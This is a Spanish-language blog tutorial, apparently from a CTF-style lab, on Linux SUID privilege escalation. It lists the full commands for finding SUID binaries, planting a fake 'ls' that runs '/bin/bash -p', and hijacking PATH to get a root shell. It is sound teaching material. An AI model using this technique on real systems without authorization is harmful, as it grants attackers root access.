Escalada de privilegios Suid
Supongamos que estamos dentro de la máquina que acabamos de vulnerar y necesitamos escalar a root, en este caso vamos a abusar de los SUID…
Escalada de privilegios Suid

Supongamos que estamos dentro de la máquina que acabamos de vulnerar y necesitamos escalar a root, en este caso vamos a abusar de los SUID por lo que vamos a enumerar los binarios que tienen tales permisos.
find / -perm -4000 -type f 2>/dev/null

Como vemos en la imagen, nos salta uno llamado vuln, que no debería estar ahí y que nos llama la atención, por lo tanto será nuestro vector de ataque.
Examinamos el binario a ver qué es lo que hace, y como vemos hace un simple ls.
Creamos un directorio falso donde pondremos nuestro archivo modificado.
mkdir /tmp/falso

Ahora creamos nuestro ls modificado y malicioso para escalar privilegios ejecutando una bash con todos los permisos.
echo '/bin/bash -p' > /tmp/falso/ls
Y lo hacemos ejecutable:
chmod +x /tmp/falso/ls

Secuestraremos el PATH para que el sistema busque nuestro ls y lo ejecute en primer lugar.
export PATH=/tmp/falso:$PATH

Ahora solo tenemos que ejecutar el binario vuln y ya tendremos una terminal como root.

메타데이터
- post_id
- ef6ebe80340e
- slug
- escalada-de-privilegios-suid-ef6ebe80340e
- url
- https://medium.com/@M4rc0sX/escalada-de-privilegios-suid-ef6ebe80340e
- canonical_url
- https://medium.com/@M4rc0sX/escalada-de-privilegios-suid-ef6ebe80340e
- author_url
- https://medium.com/@M4rc0sX
- status
- ok
- fetched_at
- 2026-07-15 21:32:05